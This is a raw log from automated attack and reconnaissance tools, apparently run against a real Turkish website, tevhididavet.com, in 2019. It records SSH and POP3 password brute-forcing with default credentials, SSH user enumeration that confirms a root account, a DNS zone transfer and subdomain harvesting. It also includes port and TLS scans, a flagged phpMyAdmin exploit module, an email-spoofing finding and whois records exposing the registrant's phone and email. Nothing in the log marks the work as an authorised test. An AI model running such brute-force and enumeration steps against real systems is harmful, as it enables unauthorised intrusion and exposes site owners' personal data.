- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 56 guesses in 203 seconds, average tps: 0.3
- | ssh-hostkey:
- | 2048 ce:7f:c0:78:16:95:0d:2c:60:dc:82:68:17:6d:e6:81 (RSA)
- | 256 79:80:3d:14:38:da:dd:ec:7f:8f:b1:f4:20:58:42:bf (ECDSA)
- |_ 256 22:0e:2b:f3:6b:fe:b2:82:41:1b:c8:19:69:04:58:23 (ED25519)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.5 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 11 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 165.90 ms 10.253.200.1
- 2 167.00 ms 213.184.122.97
- 3 166.18 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 166.21 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
- 5 218.43 ms bzq-219-189-50.cablep.bezeqint.net (62.219.189.50)
- 6 216.60 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
- 7 225.86 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
- 8 218.21 ms et-0-0-71.cr10-fra2.ip4.gtt.net (89.149.180.230)
- 9 216.47 ms ip4.gtt.net (213.254.196.10)
- 10 229.51 ms ffm-s1-rou-1101.DE.eurorings.net (134.222.48.160)
- 11 261.28 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => tevhididavet.com
- RHOST => tevhididavet.com
- [*] 93.89.20.20:22 - SSH - Using malformed packet technique
- [*] 93.89.20.20:22 - SSH - Starting scan
- [-] 93.89.20.20:22 - SSH - User 'admin' not found
- [-] 93.89.20.20:22 - SSH - User 'administrator' not found
- [-] 93.89.20.20:22 - SSH - User 'anonymous' not found
- [-] 93.89.20.20:22 - SSH - User 'backup' not found
- [-] 93.89.20.20:22 - SSH - User 'bee' not found
- [-] 93.89.20.20:22 - SSH - User 'ftp' not found
- [-] 93.89.20.20:22 - SSH - User 'guest' not found
- [-] 93.89.20.20:22 - SSH - User 'GUEST' not found
- [-] 93.89.20.20:22 - SSH - User 'info' not found
- [-] 93.89.20.20:22 - SSH - User 'mail' not found
- [-] 93.89.20.20:22 - SSH - User 'mailadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'msfadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'mysql' not found
- [-] 93.89.20.20:22 - SSH - User 'nobody' not found
- [-] 93.89.20.20:22 - SSH - User 'oracle' not found
- [-] 93.89.20.20:22 - SSH - User 'owaspbwa' not found
- [-] 93.89.20.20:22 - SSH - User 'postfix' not found
- [-] 93.89.20.20:22 - SSH - User 'postgres' not found
- [-] 93.89.20.20:22 - SSH - User 'private' not found
- [-] 93.89.20.20:22 - SSH - User 'proftpd' not found
- [-] 93.89.20.20:22 - SSH - User 'public' not found
- [+] 93.89.20.20:22 - SSH - User 'root' found
- [-] 93.89.20.20:22 - SSH - User 'superadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'support' not found
- [-] 93.89.20.20:22 - SSH - User 'sys' not found
- [-] 93.89.20.20:22 - SSH - User 'system' not found
- [-] 93.89.20.20:22 - SSH - User 'systemadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'systemadministrator' not found
- [-] 93.89.20.20:22 - SSH - User 'test' not found
- [-] 93.89.20.20:22 - SSH - User 'tomcat' not found
- [-] 93.89.20.20:22 - SSH - User 'user' not found
- [-] 93.89.20.20:22 - SSH - User 'webmaster' not found
- [-] 93.89.20.20:22 - SSH - User 'www-data' not found
- [-] 93.89.20.20:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 19:58 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7_5.1
- | dns-zone-transfer:
- | tevhididavet.com. SOA ns1.medyabim.com. hostmaster.tevhididavet.com.
- | tevhididavet.com. MX 10 mail.tevhididavet.com.
- | tevhididavet.com. TXT "v=spf1 a mx ip4:93.89.20.20 ~all"
- | tevhididavet.com. A 93.89.20.20
- | tevhididavet.com. NS ns1.medyabim.com.
- | tevhididavet.com. NS ns2.medyabim.com.
- | ftp.tevhididavet.com. A 93.89.20.20
- | mail.tevhididavet.com. A 93.89.20.20
- | pop.tevhididavet.com. A 93.89.20.20
- | smtp.tevhididavet.com. A 93.89.20.20
- | www.tevhididavet.com. A 93.89.20.20
- |_tevhididavet.com. SOA ns1.medyabim.com. hostmaster.tevhididavet.com.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.5 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | mail.tevhididavet.com - 93.89.20.20
- | www.tevhididavet.com - 93.89.20.20
- | ftp.tevhididavet.com - 93.89.20.20
- |_ smtp.tevhididavet.com - 93.89.20.20
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 170.14 ms 10.253.200.1
- 2 171.34 ms 213.184.122.97
- 3 170.33 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 171.74 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
- 5 222.96 ms bzq-219-189-230.dsl.bezeqint.net (62.219.189.230)
- 6 221.37 ms bzq-179-124-190.cust.bezeqint.net (212.179.124.190)
- 7 217.58 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
- 8 213.97 ms ip4.gtt.net (213.254.196.10)
- 9 213.41 ms et-0-0-71.cr10-fra2.ip4.gtt.net (89.149.180.230)
- 10 266.67 ms 134.222.104.205
- 11 267.93 ms 134.222.104.205
- 12 267.50 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- http://tevhididavet.com [200 OK] All-in-one-SEO-Pack[2.12.1], Apache[2], Country[TURKEY][TR], Google-Analytics[Universal][UA-62835212-1], HTML5, HTTPServer[Apache/2], IP[93.89.20.20], JQuery[1.11.1], MetaGenerator[WordPress 5.2.2], Open-Graph-Protocol[website], Script[application/ld+json,text/javascript], Title[Tevhidi Davet | Tevhide Davet Eder], UncommonHeaders[upgrade,link], WordPress[5.2.2], X-UA-Compatible[IE=edge]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://tevhididavet.com...
- _______________________________ SITE INFO _______________________________
- IP Title
- 93.89.20.20 Tevhidi Davet | Tevhide Davet Eder
- ________________________________ VERSION ________________________________
- Name Versions Type
- Roundcube CMS
- WordPress 5.2.2 CMS
- Apache 2 Platform
- ______________________________ INTERESTING ______________________________
- URL Note Type
- /readme.html Readme file Interesting
- /robots.txt robots.txt index Interesting
- /login/ Login Page Interesting
- _________________________________ TOOLS _________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- _________________________________________________________________________
- Time: 94.0 sec Urls: 443 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Sun, 23 Jun 2019 00:01:57 GMT
- Server: Apache/2
- Upgrade: h2,h2c
- Connection: Upgrade
- Link: <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- Vary: User-Agent
- Content-Type: text/html; charset=UTF-8
- HTTP/1.1 200 OK
- Date: Sun, 23 Jun 2019 00:01:58 GMT
- Server: Apache/2
- Upgrade: h2,h2c
- Connection: Upgrade
- Link: <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- Vary: User-Agent
- Content-Type: text/html; charset=UTF-8
- #######################################################################################################################################
- jQuery 1.11.1
- Google Font API
- Lazy.js
- WordPress 5.2.2
- OWL Carousel
- Apache 2
- WordPress
- React
- jQuery Migrate
- Upgrade: h2,h2c
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 20:02 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 213 guesses in 184 seconds, average tps: 1.1
- |_pop3-capabilities: USER SASL(PLAIN) PIPELINING AUTH-RESP-CODE UIDL CAPA STLS RESP-CODES TOP
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.4 - 3.10 (92%), Linux 3.5 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.11 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 166.02 ms 10.253.200.1
- 2 167.03 ms 213.184.122.97
- 3 166.07 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 231.21 ms bzq-219-189-185.dsl.bezeqint.net (62.219.189.185)
- 5 216.89 ms bzq-179-124-190.cust.bezeqint.net (212.179.124.190)
- 6 213.08 ms bzq-161-218.pop.bezeqint.net (212.179.161.218)
- 7 220.13 ms bzq-179-124-74.cust.bezeqint.net (212.179.124.74)
- 8 218.91 ms ip4.gtt.net (213.254.196.10)
- 9 228.15 ms ffm-s1-rou-1101.DE.eurorings.net (134.222.48.160)
- 10 223.17 ms ip4.gtt.net (213.254.196.10)
- 11 223.20 ms ffm-s1-rou-1101.DE.eurorings.net (134.222.48.160)
- 12 267.01 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- Version: 1.11.13-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 93.89.20.20
- Testing SSL server tevhididavet.com on port 443 using SNI name tevhididavet.com
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha1WithRSAEncryption
- RSA Key Strength: 2048
- Subject: localhost
- Issuer: localhost
- Not valid before: Jun 15 12:50:24 2017 GMT
- Not valid after: Oct 30 12:50:24 2044 GMT
- #######################################################################################################################################
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +------------+-------------------------------------+--------------------------------------------------+-----------+-----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +------------+-------------------------------------+--------------------------------------------------+-----------+-----------+
- | phpMyAdmin | https://93.89.20.20:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
- +------------+-------------------------------------+--------------------------------------------------+-----------+-----------+
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- tevhididavet.com -----
- Host's addresses:
- __________________
- tevhididavet.com. 10351 IN A 93.89.20.20
- Name Servers:
- ______________
- ns2.medyabim.com. 84737 IN A 93.89.19.11
- ns1.medyabim.com. 84737 IN A 93.89.16.11
- Mail (MX) Servers:
- ___________________
- mail.tevhididavet.com. 11031 IN A 93.89.20.20
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for tevhididavet.com on ns2.medyabim.com ...
- Trying Zone Transfer for tevhididavet.com on ns1.medyabim.com ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Registry Domain ID: 1707504235_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.PublicDomainRegistry.com
- Registrar URL: http://www.publicdomainregistry.com
- Updated Date: 2019-05-08T22:31:42Z
- Creation Date: 2012-03-16T13:33:15Z
- Registry Expiry Date: 2021-03-16T13:33:15Z
- Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
- Registrar IANA ID: 303
- Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
- Registrar Abuse Contact Phone: +1.2013775952
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Name Server: NS1.MEDYABIM.COM
- Name Server: NS2.MEDYABIM.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- #######################################################################################################################################
- Registrars.
- Domain Name: TEVHIDIDAVET.COM
- Registry Domain ID: 1707504235_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.publicdomainregistry.com
- Registrar URL: www.publicdomainregistry.com
- Updated Date: 2019-05-08T22:31:43Z
- Creation Date: 2012-03-16T13:33:15Z
- Registrar Registration Expiration Date: 2021-03-16T13:33:15Z
- Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
- Registrar IANA ID: 303
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Registry Registrant ID: Not Available From Registry
- Registrant Name: TEVHIDI DAVET
- Registrant Organization: ---
- Registrant Street: Merkez cad istanbul
- Registrant City: ISTANBULAS
- Registrant State/Province:
- Registrant Postal Code: 00034
- Registrant Country: TR
- Registrant Phone: +90.5558259900
- Registrant Phone Ext:
- Registrant Fax:
- Registrant Fax Ext:
- Registrant Email: tevhididavetcom@gmail.com
- Registry Admin ID: Not Available From Registry
- Admin Name: TEVHIDI DAVET
- Admin Organization: ---
- Admin Street: Merkez cad istanbul
- Admin City: ISTANBULAS
- Admin State/Province:
- Admin Postal Code: 00034
- Admin Country: TR
- Admin Phone: +90.5558259900
- Admin Phone Ext:
- Admin Fax:
- Admin Fax Ext:
- Admin Email: tevhididavetcom@gmail.com
- Registry Tech ID: Not Available From Registry
- Tech Name: TEVHIDI DAVET
- Tech Organization: ---
- Tech Street: Merkez cad istanbul
- Tech City: ISTANBULAS
- Tech State/Province:
- Tech Postal Code: 00034
- Tech Country: TR
- Tech Phone: +90.5558259900
- Tech Phone Ext:
- Tech Fax:
- Tech Fax Ext:
- Tech Email: tevhididavetcom@gmail.com
- Name Server: ns1.medyabim.com
- Name Server: ns2.medyabim.com
- DNSSEC: Unsigned
- Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
- Registrar Abuse Contact Phone: +1.2013775952
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [1/25] /?sa=X
- [x] Error downloading /?sa=X
- [2/25] /advanced_search
- [x] Error downloading /advanced_search
- [3/25] http://www.tevhididavet.com/pdf/risaleler/kafirleri_desteklemek.pdf
- [x] Error in the parsing process
- [4/25] http://www.tevhididavet.com/pdf/onderler/bilal_b_rebah.pdf
- [x] Error in the parsing process
- [5/25] http://www.tevhididavet.com/pdf/risaleler/imanintanimi.pdf
- [x] Error in the parsing process
- [6/25] http://www.tevhididavet.com/pdf/risaleler/tagutu_red_etmek.pdf
- [x] Error in the parsing process
- [7/25] http://www.tevhididavet.com/pdf/risaleler/haya.pdf
- [8/25] http://www.tevhididavet.com/pdf/risaleler/akidemiz.pdf
- [x] Error in the parsing process
- [9/25] http://www.tevhididavet.com/pdf/risaleler/ittiba_risalesi.pdf
- [x] Error in the parsing process
- [10/25] http://www.tevhididavet.com/pdf/onderler/selman_farisi.pdf
- [x] Error in the parsing process
- [11/25] http://www.tevhididavet.com/pdf/risaleler/kulluk.pdf
- [x] Error in the parsing process
- [12/25] http://www.tevhididavet.com/pdf/risaleler/isim_sifat_tevhidindeki_kaideler.pdf
- [x] Error in the parsing process
- [13/25] http://www.tevhididavet.com/pdf/kitablar/taguta_muhakeme_olmayi_istiyorlar.pdf
- [x] Error in the parsing process
- [14/25] http://www.tevhididavet.com/pdf/risaleler/taguttan_hukum_istemek.pdf
- [x] Error in the parsing process
- [15/25] http://www.tevhididavet.com/pdf/risaleler/rasulullaha_%2520eziyetin_hukmu.pdf
- [x] Error in the parsing process
- [16/25] http://www.tevhididavet.com/pdf/risaleler/ammar_b_yasir.pdf
- [x] Error in the parsing process
- [17/25] http://www.tevhididavet.com/pdf/risaleler/nisa_59_tefsiri.pdf
- [x] Error in the parsing process
- [18/25] http://www.tevhididavet.com/pdf/risaleler/dort_mezhebe_gore_abdest.pdf
- [19/25] http://www.tevhididavet.com/pdf/risaleler/sigara_belasi.pdf
- [20/25] http://www.tevhididavet.com/pdf/risaleler/besmelenin_tefsiri.pdf
- [21/25] http://www.tevhididavet.com/pdf/risaleler/ebuhanife.pdf
- [22/25] http://www.tevhididavet.com/pdf/risaleler/dort_mezhebe_gore_gusul.pdf
- [23/25] http://www.tevhididavet.com/pdf/kitablar/tevhid_ve_kisimleri.pdf
- [24/25] http://www.tevhididavet.com/pdf/risaleler/et_risalesi.pdf
- [25/25] http://www.tevhididavet.com/pdf/risaleler/imani_bozan_seyler.pdf
- ---------------------------------------------------------------------------------------------------------------------------------------
- ��Jʛ!���%��j��%D��+
- M�slim
- Muslim
- ��M�sliM
- New
- 1;Abdullah Said
- [+] List of software found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- ���
- Uғ'���$ռ
- k�/B�O�/˭-wW7�*�9��1�v�x2;
- ���E��
- Investintech.com Inc.(www.investintech.com)
- Sonic PDF
- ��Microsoft� Word 2010
- Microsoft� Word 2010
- #######################################################################################################################################
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- DNSdumpster: www.tevhididavet.com
- DNSdumpster: mail.tevhididavet.com
- [-] Saving results to file: /usr/share/sniper/loot//domains/domains-tevhididavet.com.txt
- [-] Total Unique Subdomains Found: 2
- www.tevhididavet.com
- mail.tevhididavet.com
- #######################################################################################################################################
- ===============================================
- -=Subfinder v1.1.3 github.com/subfinder/subfinder
- ===============================================
- Running Source: Ask
- Running Source: Archive.is
- Running Source: Baidu
- Running Source: Bing
- Running Source: CertDB
- Running Source: CertificateTransparency
- Running Source: Certspotter
- Running Source: Commoncrawl
- Running Source: Crt.sh
- Running Source: Dnsdb
- Running Source: DNSDumpster
- Running Source: DNSTable
- Running Source: Dogpile
- Running Source: Exalead
- Running Source: Findsubdomains
- Running Source: Googleter
- Running Source: Hackertarget
- Running Source: Ipv4Info
- Running Source: PTRArchive
- Running Source: Sitedossier
- Running Source: Threatcrowd
- Running Source: ThreatMiner
- Running Source: WaybackArchive
- Running Source: Yahoo
- Running enumeration on tevhididavet.com
- dnsdb: Unexpected return status 503
- waybackarchive: parse http://web.archive.org/cdx/search/cdx?url=*.tevhididavet.com/*&output=json&fl=original&collapse=urlkey&page=: net/url: invalid control character in URL
- dogpile: Get https://www.dogpile.com/search/web?q=tevhididavet.com&qsi=1: EOF
- ipv4info: <nil>
- Starting Bruteforcing of tevhididavet.com with 9985 words
- Total 10 Unique subdomains found for tevhididavet.com
- .tevhididavet.com
- ftp.tevhididavet.com
- hostmaster.tevhididavet.com
- mail.tevhididavet.com
- mail.tevhididavet.com
- pop.tevhididavet.com
- smtp.tevhididavet.com
- unix.tevhididavet.com
- www.tevhididavet.com
- www.tevhididavet.com
- #######################################################################################################################################
- [*] Processing domain tevhididavet.com
- [*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
- [+] Getting nameservers
- 93.89.19.11 - ns2.medyabim.com
- 93.89.16.11 - ns1.medyabim.com
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 a mx ip4:93.89.20.20 ~all"
- [+] MX records found, added to target list
- 10 mail.tevhididavet.com.
- [*] Scanning tevhididavet.com for A records
- 93.89.20.20 - tevhididavet.com
- 93.89.20.20 - ftp.tevhididavet.com
- 93.89.20.20 - mail.tevhididavet.com
- 93.89.20.20 - pop.tevhididavet.com
- 93.89.20.20 - smtp.tevhididavet.com
- 93.89.20.20 - www.tevhididavet.com
- #######################################################################################################################################
- [*] Found SPF record:
- [*] v=spf1 a mx ip4:93.89.20.20 ~all
- [*] SPF record contains an All item: ~all
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for tevhididavet.com!
- #######################################################################################################################################
- dig: '.tevhididavet.com' is not a legal name (empty label)
- SubOver v.1.2 Nizamul Rana (@Ice3man)
- ==================================================
- [~] Enjoy your hunt !
- [Not Vulnerable]
- [Not Vulnerable] 82.166.160.136
- [Not Vulnerable] .tevhididavet.com
- [Not Vulnerable] 104.154.60.12
- [Not Vulnerable] 62.12.105.2
- [Not Vulnerable] domain
- [Not Vulnerable] hostmaster.tevhididavet.com
- [Not Vulnerable] ftp.tevhididavet.com
- [Not Vulnerable] mail.tevhididavet.com
- [Not Vulnerable] pop.tevhididavet.com
- [Not Vulnerable] bpunion.org
- [Not Vulnerable] smtp.tevhididavet.com
- [Not Vulnerable] unix.tevhididavet.com
- [Not Vulnerable] www.tevhididavet.com
- [Not Vulnerable] tevhididavet.com
- [Not Vulnerable] www.envkh.gov.sd
- [Not Vulnerable] www.lapam.gov.il
- #######################################################################################################################################
- 37.247.112.0/24
- 37.247.113.0/24
- 37.247.114.0/24
- 93.89.16.0/24
- 93.89.17.0/24
- 93.89.18.0/24
- 93.89.19.0/24
- 93.89.20.0/24
- 93.89.21.0/24
- 93.89.22.0/24
- 93.89.24.0/24
- 93.89.25.0/24
- 93.89.26.0/24
- 93.89.27.0/24
- 93.89.28.0/24
- 93.89.29.0/24
- 93.89.30.0/24
- 93.89.31.0/24
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 20:25 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- Not shown: 339 closed ports, 124 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- Nmap done: 1 IP address (1 host up) scanned in 4.24 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 20:25 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.25s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- Not shown: 11 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- Nmap done: 1 IP address (1 host up) scanned in 6.56 seconds
- #######################################################################################################################################
